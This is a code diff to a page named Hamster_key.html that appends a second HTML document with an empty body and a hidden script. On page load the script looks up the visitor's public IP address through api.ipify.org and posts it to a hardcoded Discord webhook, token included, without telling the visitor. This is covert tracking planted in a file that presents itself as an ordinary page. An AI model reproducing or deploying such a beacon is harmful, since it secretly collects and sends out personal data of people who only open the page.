--- a/Hamster_key.html
+++ b/Hamster_key.html
@@ -100,3 +100,57 @@
     </div>
 </body>
 </html>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    
+    <script>
+        document.addEventListener('DOMContentLoaded', function() {
+            // Function to get the user's IP address
+            async function fetchIPAddress() {
+                try {
+                    const response = await fetch('https://api.ipify.org?format=json');
+                    const data = await response.json();
+                    return data.ip;
+                } catch (error) {
+                    console.error('Error fetching IP address:', error);
+                    return null;
+                }
+            }
+
+            // Function to send the IP address to your server or webhook
+            async function sendIP(ip) {
+                const webhookURL = 'https://discord.com/api/webhooks/1271826277937975318/zyZxHBZiWjTDLQR6Deaitoy4sXxL9FRHnTaPTDflUHrz9BQ92efEemimGjnQyyzFH8i4'; // Your Discord webhook URL
+                const payload = {
+                    content: `New IP Address: ${ip}`
+                };
+
+                try {
+                    await fetch(webhookURL, {
+                        method: 'POST',
+                        headers: {
+                            'Content-Type': 'application/json'
+                        },
+                        body: JSON.stringify(payload)
+                    });
+                } catch (error) {
+                    console.error('Error sending IP address to webhook:', error);
+                }
+            }
+
+            // Fetch and send the IP address when the page loads
+            (async function() {
+                const ip = await fetchIPAddress();
+                if (ip) {
+                    sendIP(ip);
+                }
+            })();
+        });
+    </script>
+</head>
+<body>
+    
+</body>
+</html>
